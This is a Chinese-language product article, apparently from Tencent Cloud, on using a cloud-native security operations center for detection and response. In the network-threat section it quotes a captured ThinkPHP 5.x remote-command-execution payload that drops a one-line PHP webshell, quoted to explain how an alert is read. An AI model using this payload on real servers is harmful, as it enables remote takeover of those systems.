“用云的方式保護(hù)云”：

如何利用云原生SOC進(jìn)行云端檢測(cè)與響應(yīng)

傳統(tǒng)企業(yè)安全中，部署了EDR（Endpoint Detection and Response）及NDR（Network Detection and Response）產(chǎn)品的企業(yè)，可及時(shí)定位失陷資產(chǎn)，響應(yīng)終端威脅，減少攻擊產(chǎn)生的危害。EDR和NDR在傳統(tǒng)企業(yè)安全中為企業(yè)起到了保駕護(hù)航的重要作用。但隨著云計(jì)算的到來，越來越多的企業(yè)將自己的業(yè)務(wù)上云，云原生安全越來越受到企業(yè)的關(guān)注與重視，隨之云端檢測(cè)與響應(yīng)（Cloud Detection and Response，CDR）的理念也應(yīng)運(yùn)而生。下面我們將圍繞騰訊云安全運(yùn)營(yíng)中心這款產(chǎn)品的部分功能，來給大家介紹一下，如何依托云的優(yōu)勢(shì)，進(jìn)行及時(shí)的風(fēng)險(xiǎn)檢測(cè)與響應(yīng)處置，最終保護(hù)用戶的云上安全。

事前安全預(yù)防

云安全配置管理

Gartner近日在《How to Make Cloud More Secure You’re your Own Data Center》（如何讓云比你自己的數(shù)據(jù)中心更安全）報(bào)告中指出，大多數(shù)成功的云攻擊都是由錯(cuò)誤引起的。例如配置錯(cuò)誤、缺少修補(bǔ)程序或基礎(chǔ)架構(gòu)的憑據(jù)管理不當(dāng)?shù)?。而通過明顯利用IaaS計(jì)算和網(wǎng)絡(luò)結(jié)構(gòu)的內(nèi)置安全能力和高度自動(dòng)化，企業(yè)實(shí)際上是可以減少配置、管理不當(dāng)?shù)儒e(cuò)誤的機(jī)會(huì)。這樣做既能減少攻擊面，也有利于改善企業(yè)云安全態(tài)勢(shì)。

云安全運(yùn)營(yíng)中心在事前預(yù)防階段的主要任務(wù)就是對(duì)云上資產(chǎn)進(jìn)行定期自動(dòng)化風(fēng)險(xiǎn)評(píng)估，查缺補(bǔ)漏，及時(shí)發(fā)現(xiàn)風(fēng)險(xiǎn)點(diǎn)并進(jìn)行修復(fù)和處置。安全運(yùn)營(yíng)中心可以幫租戶梳理資產(chǎn)的漏洞詳情，探測(cè)對(duì)外開放的高危端口，識(shí)別資產(chǎn)類型，檢查云安全配置項(xiàng)目等。自動(dòng)化的幫助租戶全面評(píng)估云上資產(chǎn)的風(fēng)險(xiǎn)。下面簡(jiǎn)單介紹一下云安全配置管理（CSPM），讓大家更直觀的感受到如何進(jìn)行事前的安全預(yù)防。

上圖就是安全運(yùn)營(yíng)中心的云安全配置管理頁面。借助騰訊云各個(gè)產(chǎn)品提供的接口，安全運(yùn)營(yíng)中心對(duì)8類資產(chǎn)，近20個(gè)檢查項(xiàng)進(jìn)行了檢查和可視化展示?？梢钥吹巾撁嫔狭谐隽藱z查項(xiàng)的總數(shù)，未通過檢查項(xiàng)總數(shù)，檢查總資產(chǎn)數(shù)，配置風(fēng)險(xiǎn)資產(chǎn)數(shù)。另外下方列出了詳細(xì)的檢測(cè)項(xiàng)，包括了：云平臺(tái)-云審計(jì)配置檢查，SSL證書-有效期檢查，CLB-高危端口暴露，云鏡-主機(jī)安全防護(hù)狀態(tài)，COS-文件權(quán)限設(shè)置，CVM-密鑰對(duì)登陸等。

以CVM-密鑰對(duì)登錄檢查項(xiàng)為例，這個(gè)檢查項(xiàng)主要是檢測(cè)CVM是否利用SSH密鑰進(jìn)行登錄。因?yàn)閭鹘y(tǒng)的賬號(hào)+密碼的登錄方式，存在被暴力破解的可能性。如果暴力破解成功，那資產(chǎn)有可能會(huì)淪陷為黑客的肉雞，成為進(jìn)一步內(nèi)網(wǎng)橫向滲透的跳板。所以針對(duì)此風(fēng)險(xiǎn)進(jìn)行事前防御的檢查，能夠規(guī)避很大一部分的安全事件。

合規(guī)管理

等保2.0提出了“一個(gè)中心，三重防護(hù)”，其中“一個(gè)中心”指的便是安全管理中心，即針對(duì)安全管理中心和計(jì)算環(huán)境安全、區(qū)域邊界安全、通信網(wǎng)絡(luò)安全的安全合規(guī)進(jìn)行方案設(shè)計(jì)，建立以計(jì)算環(huán)境安全為基礎(chǔ)，以區(qū)域邊界安全、通信網(wǎng)絡(luò)安全為保障，以安全管理中心為核心的信息安全整體保障體系。安全運(yùn)營(yíng)中心在提供滿足等保2.0合規(guī)要求的日志審計(jì)、內(nèi)到外威脅感知及其他安全管理中心要求功能的基礎(chǔ)上，為用戶提供針對(duì)部分等保2.0要求的自動(dòng)化評(píng)估功能，實(shí)現(xiàn)持續(xù)動(dòng)態(tài)的自動(dòng)化合規(guī)評(píng)估和管理。可根據(jù)等級(jí)保護(hù)等合規(guī)標(biāo)準(zhǔn)要求，對(duì)云上的合規(guī)風(fēng)險(xiǎn)進(jìn)行評(píng)估，并提供相應(yīng)的風(fēng)險(xiǎn)處置建議。

事中監(jiān)測(cè)與檢測(cè)

網(wǎng)絡(luò)安全-互聯(lián)網(wǎng)流量威脅感知

當(dāng)云上安全事件發(fā)生時(shí)，能夠及時(shí)地發(fā)現(xiàn)并進(jìn)行告警，幫助租戶對(duì)癥下藥，對(duì)于租戶進(jìn)行資產(chǎn)排查和處置也尤為重要。下圖展示的是安全運(yùn)營(yíng)中心網(wǎng)絡(luò)安全頁面。

網(wǎng)絡(luò)安全主要是針對(duì)租戶資產(chǎn)的網(wǎng)絡(luò)南北向流量進(jìn)行的安全檢測(cè)。借助騰訊云平臺(tái)安全能力，實(shí)時(shí)監(jiān)測(cè)租戶資產(chǎn)互聯(lián)網(wǎng)流量中的異常，并向租戶進(jìn)行告警與提醒。目前網(wǎng)絡(luò)安全的檢測(cè)能力覆蓋了45類的網(wǎng)絡(luò)攻擊類型。下面列舉出9類高風(fēng)險(xiǎn)的威脅類型：

1，SQL注入攻擊；2，敏感文件探測(cè)；3，命令注入攻擊；4，認(rèn)證暴力猜解；5，惡意文件上傳；6，XSS攻擊；7，webshell探測(cè)；8，各類漏洞利用（包括心臟滴血，struts，weblogic漏洞等比較重要的組件）9，反彈shell行為等 10，主機(jī)挖礦

告警包括源ip，目的ip，受害者資產(chǎn)，次數(shù)，類型，威脅等級(jí)以及時(shí)間等。通過點(diǎn)擊詳情可以看到更豐富的詳細(xì)信息。

除五元組的信息外，也展示了攻擊載荷的詳細(xì)數(shù)據(jù)，可以清晰的看到payload內(nèi)容，攻擊載荷有時(shí)也能了解到黑客的攻擊意圖，可以幫助安全團(tuán)隊(duì)更有針對(duì)性地進(jìn)行排查。以上圖的攻擊為例，可以看到攻擊載荷是存在于http頭中

/public/index.php？s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars［0］=system&vars［1］［］=echo ^《？php $action = $_GET［‘xcmd’］;system（$action）;？^》》hydra.php

通過載荷數(shù)據(jù)看到，黑客是利用ThinkPHP 5.x遠(yuǎn)程命令執(zhí)行漏洞來攻擊客戶資產(chǎn)的。該漏洞的產(chǎn)生是由于程序未對(duì)控制器進(jìn)行過濾，導(dǎo)致攻擊者可以通過引入‘’符號(hào)來調(diào)用任意類方法執(zhí)行命令。而黑客想要執(zhí)行的命令是：

echo ^《？php $action = $_GET［‘xcmd’］;system（$action）;？^》》hydra.php

如果漏洞利用成功，此條命令會(huì)釋放一個(gè)webshell一句話木馬到服務(wù)器，并命名為hydra.php，黑客可以借助webshell小馬，上傳大馬，從而進(jìn)行更多的內(nèi)網(wǎng)滲透工作，對(duì)內(nèi)網(wǎng)造成更嚴(yán)重的危害。

安全運(yùn)維人員可以根據(jù)詳情頁中的處置建議進(jìn)行一些排查和處置。例如通過ACL策略封禁源IP，阻斷其進(jìn)一步的攻擊。同時(shí)可以在安全事件頁中查看該資產(chǎn)是否存在該漏洞，以及webshell木馬是否已經(jīng)落地。及時(shí)有效的安全排查，可以很大程度上降低安全事件的危害。

網(wǎng)絡(luò)安全事件同時(shí)提供了攻擊者畫像與受害者畫像?；跉v史的數(shù)據(jù)，對(duì)攻擊者近期發(fā)起的網(wǎng)絡(luò)威脅進(jìn)行匯總，關(guān)聯(lián)是否還有其他的攻擊手段。幫助客戶更全方位的了解攻擊者。下圖展示的就是攻擊者畫像。

下圖則是受害者畫像，流量威脅TOP5，展示的是受害資產(chǎn)近期遭受的攻擊類型次數(shù)排名，可以幫助客戶更有針對(duì)性的對(duì)資產(chǎn)進(jìn)行合理的處置。流量威脅趨勢(shì)，可以更直觀的了解到資產(chǎn)近期的安全現(xiàn)狀。

泄漏檢測(cè)

數(shù)據(jù)泄露指受保護(hù)或機(jī)密數(shù)據(jù)可能被未經(jīng)授權(quán)的人查看、偷竊或使用。由于企業(yè)業(yè)務(wù)性質(zhì)、開發(fā)制度等原因，互聯(lián)網(wǎng)公司一般會(huì)涉及較多的版本變更，且大部分互聯(lián)網(wǎng)企業(yè)內(nèi)部崇尚開源文化，開放的同時(shí)，也為數(shù)據(jù)泄露事件埋下隱患。近幾年從泄漏渠道上來看主要有以下幾個(gè)分類：GitHub代碼類，網(wǎng)站入侵類，網(wǎng)絡(luò)黑市交易類，合作商接口調(diào)用類等。

安全運(yùn)營(yíng)中心在GitHub和網(wǎng)絡(luò)黑市這兩個(gè)渠道進(jìn)行了數(shù)據(jù)泄露的監(jiān)控。

通過安全運(yùn)營(yíng)中心的統(tǒng)一監(jiān)控和處理，可以解放企業(yè)運(yùn)維安全人員更多的時(shí)間，將更多精力集中在規(guī)則運(yùn)營(yíng)上。同時(shí)也能與云平臺(tái)能夠更好的整合開發(fā)、運(yùn)維，將事件處理集中在一處，提高處理效率。在誤報(bào)規(guī)則的運(yùn)營(yíng)處理方面，SaaS 化的平臺(tái)比開源系統(tǒng)運(yùn)營(yíng)更持久，基于云上用戶的體驗(yàn)集中優(yōu)化，目前由云鼎實(shí)驗(yàn)室團(tuán)隊(duì)進(jìn)行后臺(tái)策略維護(hù)支持，誤報(bào)問題相對(duì)較少，告警的質(zhì)量相對(duì)較高。

上圖就是泄漏檢測(cè)的頁面。安全運(yùn)維人員進(jìn)行配置后，即可監(jiān)控自己所關(guān)注的敏感信息是否在上面兩個(gè)源中有泄漏。當(dāng)騰訊云的SecretId由于各種原因，出現(xiàn)在GitHub上時(shí)，安全運(yùn)維人員可以及時(shí)的發(fā)現(xiàn)，盡快進(jìn)行處置，避免發(fā)生更大的安全事故。

事后響應(yīng)處置

安全事件發(fā)生后，云安全運(yùn)營(yíng)中心借助調(diào)查中心和響應(yīng)中心分別提供了溯源調(diào)查以及自動(dòng)化響應(yīng)的能力。下面分別介紹一下這兩個(gè)部分。

調(diào)查中心

調(diào)查中心，目前接入了七類日志，有資產(chǎn)日志，指紋信息，漏洞詳情，安全事件，用戶行為分析，云審計(jì)以及負(fù)載均衡。日志調(diào)查中心提供的查詢語法類似于kibana的查詢語法，可以根據(jù)自己的需求組合出多種搜索語句。在后面的篇幅中，結(jié)合安全溯源，也會(huì)有所介紹

資產(chǎn)類型，展示的是客戶部署在騰訊云上的各類資產(chǎn)的詳細(xì)信息。圖中能看到有cvm，cos存儲(chǔ)，負(fù)載均衡，數(shù)據(jù)庫(kù)等資產(chǎn)類型

在日志調(diào)查搜索框中，可以通過多個(gè)條件組的組合，完成一些資產(chǎn)數(shù)據(jù)的統(tǒng)計(jì)。例如統(tǒng)計(jì)cvm上遭受攻擊次數(shù)大于100小于1000的機(jī)器。

資產(chǎn)指紋

包含了進(jìn)程，端口，組件，賬戶等信息。

下表列出比較關(guān)鍵的字段信息，更多的字段可以在日志調(diào)查中查看

漏洞信息

列舉機(jī)器上的漏洞名稱，漏洞描述，漏洞等級(jí)，漏洞類型，cve號(hào)，修復(fù)方案，參考鏈接，處理狀態(tài)，影響的機(jī)器數(shù)等。這些信息也可以在資產(chǎn)中心-》漏洞管理中進(jìn)行查看。

事件信息

事件包含了waf，ddos，云鏡等產(chǎn)品發(fā)現(xiàn)的安全事件，比較重要的有密碼破解，異地登錄，web攻擊，以及木馬。這些信息也可以在安全事件頁中進(jìn)行查看

用戶行為分析

UBA日志存放的是用戶行為分析日志，該模塊主要基于騰訊云用戶在控制臺(tái)的相關(guān)操作記錄以及使用云api進(jìn)行自動(dòng)化操作的相關(guān)記錄進(jìn)行賬號(hào)安全性分析，并及時(shí)提示運(yùn)維人員進(jìn)行相關(guān)風(fēng)險(xiǎn)處理。目前UBA模塊已有的風(fēng)險(xiǎn)場(chǎng)景有以下四種：用戶權(quán)限提升、資產(chǎn)高風(fēng)險(xiǎn)權(quán)限修改、用戶權(quán)限遍歷、新用戶高危操作。

CLB

CLB存放的是騰訊云負(fù)載均衡產(chǎn)品的訪問日志數(shù)據(jù)，負(fù)載均衡（Cloud Load Balancer）是對(duì)多臺(tái)云服務(wù)器進(jìn)行流量分發(fā)的服務(wù)。負(fù)載均衡可以通過流量分發(fā)擴(kuò)展應(yīng)用系統(tǒng)對(duì)外的服務(wù)能力，通過消除單點(diǎn)故障提升應(yīng)用系統(tǒng)的可用性。

響應(yīng)中心

響應(yīng)中心是在安全事件發(fā)生后，通過內(nèi)置的安全編排響應(yīng)劇本，聯(lián)動(dòng)云上各類安全措施和產(chǎn)品對(duì)安全事件進(jìn)行自動(dòng)化響應(yīng)處置并提供響應(yīng)報(bào)告詳情，可以及時(shí)阻斷風(fēng)險(xiǎn)，配置加固資產(chǎn)，將安全事件的風(fēng)險(xiǎn)最大程度的降到最低。目前內(nèi)置的劇本有SSH口令爆破類事件、RDP口令爆破類事件、Linux主機(jī)挖礦木馬類事件及Windows主機(jī)挖礦木馬類事件等云上常見的安全事件。

以SSH口令爆破事件為例，來看一下當(dāng)安全事件發(fā)生后，響應(yīng)中心如何快速的進(jìn)行處置，將風(fēng)險(xiǎn)盡快排除。

上圖可以看到，當(dāng)SSH口令爆破事件發(fā)生后，劇本提供了四個(gè)步驟來處置，依次是：排查攻擊源，排查被攻擊資產(chǎn)，基線檢測(cè)，木馬檢測(cè)。

1，排查攻擊源

如果攻擊發(fā)生在外網(wǎng)，那么就聯(lián)動(dòng)安全組封禁外網(wǎng)的攻擊IP。如果是發(fā)生在內(nèi)網(wǎng)，就及時(shí)隔離內(nèi)網(wǎng)攻擊資產(chǎn)的網(wǎng)絡(luò)，同時(shí)檢測(cè)攻擊源資產(chǎn)是否安裝了云鏡專業(yè)版，因?yàn)閮?nèi)網(wǎng)主機(jī)發(fā)起橫向爆破攻擊，極有可能是在之前已經(jīng)失陷。

2，排查被攻擊自查

如果被攻擊資產(chǎn)爆破成功，那么首先要及時(shí)修改賬戶密碼，同時(shí)要盡快隔離被攻擊資產(chǎn)的網(wǎng)絡(luò)，防止黑客借助此機(jī)器作為跳板發(fā)起進(jìn)一步的內(nèi)網(wǎng)滲透攻擊。同時(shí)檢測(cè)這個(gè)資產(chǎn)是否安裝了云鏡專業(yè)版進(jìn)行主機(jī)側(cè)的防御。

3，基線檢測(cè)

調(diào)用云鏡接口對(duì)資產(chǎn)進(jìn)行基線檢測(cè)，及時(shí)發(fā)現(xiàn)風(fēng)險(xiǎn)并修復(fù)。

4，木馬檢測(cè)

對(duì)資產(chǎn)進(jìn)行木馬查殺，防止黑客落地惡意文件。

通過劇本的以上四個(gè)步驟，可以及時(shí)高效地處置SSH口令爆破事件，降低安全事件所帶來的風(fēng)險(xiǎn)。

“云上打馬”：如何利用云原生SOC實(shí)踐CDR

最后借助一個(gè)挖礦木馬的場(chǎng)景，看一下企業(yè)的安全運(yùn)維人員，如何借助上文提到的安全運(yùn)營(yíng)中心的功能，來處理安全事件。

云安全配置管理：

安全運(yùn)維人員，可以在云安全配置管理頁面檢查CVM是否啟用了密鑰對(duì)，主機(jī)安全防護(hù)狀態(tài)是否正常。通過CVM配置風(fēng)險(xiǎn)的自動(dòng)化檢查，降低云上資產(chǎn)的安全風(fēng)險(xiǎn)。

攻擊面測(cè)繪：

通過攻擊面測(cè)繪識(shí)別主機(jī)的攻擊面，及時(shí)收斂不必要的暴露面。

網(wǎng)絡(luò)安全：

網(wǎng)絡(luò)安全中，通過告警的詳情頁，獲取挖礦告警更詳細(xì)的信息。下圖展示的是挖礦告警的詳情。

詳情頁可以獲取到源端口，受影響資產(chǎn)等信息，這些信息可以用到日志調(diào)查中進(jìn)行溯源查詢。同時(shí)通過傳輸數(shù)據(jù)的內(nèi)容可以看出木馬正在進(jìn)行門羅幣的挖礦。

響應(yīng)中心：

當(dāng)發(fā)現(xiàn)挖礦木馬告警后，可以借助響應(yīng)中心，完成響應(yīng)處置。

首先進(jìn)行礦池連接的阻斷，阻止失陷資產(chǎn)與礦池的數(shù)據(jù)流量傳輸。隨后進(jìn)行木馬檢測(cè)，借助云鏡的主機(jī)安全能力，定位挖礦木馬并進(jìn)行木馬隔離。在文件層面進(jìn)行處置后，對(duì)正在運(yùn)行的挖礦進(jìn)程也要進(jìn)行定位。劇本提供了四項(xiàng)處置方式，可以根據(jù)響應(yīng)時(shí)詳細(xì)的提示進(jìn)行排查，確定挖礦進(jìn)程并清除。最后進(jìn)行基線的檢測(cè)，對(duì)弱密碼和漏洞進(jìn)行檢測(cè)，提高資產(chǎn)的安全基線，加固資產(chǎn)的安全，及時(shí)的將風(fēng)險(xiǎn)降到最低。

調(diào)查中心：

借助網(wǎng)絡(luò)安全提供的端口，資產(chǎn)等信息，可以在調(diào)查中心中對(duì)挖礦木馬的落地進(jìn)行溯源分析。

調(diào)查中心的安全事件日志（event）中，查看挖礦主機(jī)是否有木馬告警（SsaCvmInstanceId：受影響資產(chǎn)）

如果有木馬告警，根據(jù)安全事件日志中記錄的木馬路徑在資產(chǎn)指紋日志（assets_finger）中，尋找相關(guān)的木馬進(jìn)程（fullpath： 木馬路徑），進(jìn)程的pid，以及用戶信息

根據(jù)機(jī)器信息，在安全事件日志（event）中搜索是否有異地登錄和密碼暴力破解成功相關(guān)的告警。進(jìn)行溯源查找

同時(shí)也可以查看網(wǎng)絡(luò)安全中，是否存在相關(guān)機(jī)器的惡意文件上傳以及漏洞攻擊的告警，進(jìn)一步排查木馬落地的原因。

面對(duì)云上安全的新挑戰(zhàn)，騰訊安全極為重視企業(yè)安全的“云原生”思維價(jià)值，并結(jié)合自身安全運(yùn)營(yíng)經(jīng)驗(yàn)及廣泛的云上客戶調(diào)研，總結(jié)出云原生的CDR體系（Cloud Detection and Response），包含事前安全預(yù)防體系、事中統(tǒng)一監(jiān)測(cè)及威脅檢測(cè)體系和事后響應(yīng)處置體系，并建立全程的安全可視體系，以提升公有云上安全運(yùn)營(yíng)的靈敏度及效率，目前這套理念已依托騰訊云安全運(yùn)營(yíng)中心持續(xù)實(shí)踐，幫助多個(gè)企業(yè)用戶解決云上安全問題。

作為騰訊云的能力支持，騰訊安全已經(jīng)實(shí)現(xiàn)了為騰訊云客戶提供云原生的安全能力，提升企業(yè)信息安全“免疫力”，配合騰訊云及其認(rèn)證的生態(tài)合作伙伴，打造內(nèi)在的安全韌性，構(gòu)建彈性擴(kuò)展、操作性強(qiáng)的安全架構(gòu)，滿足動(dòng)態(tài)的安全需求。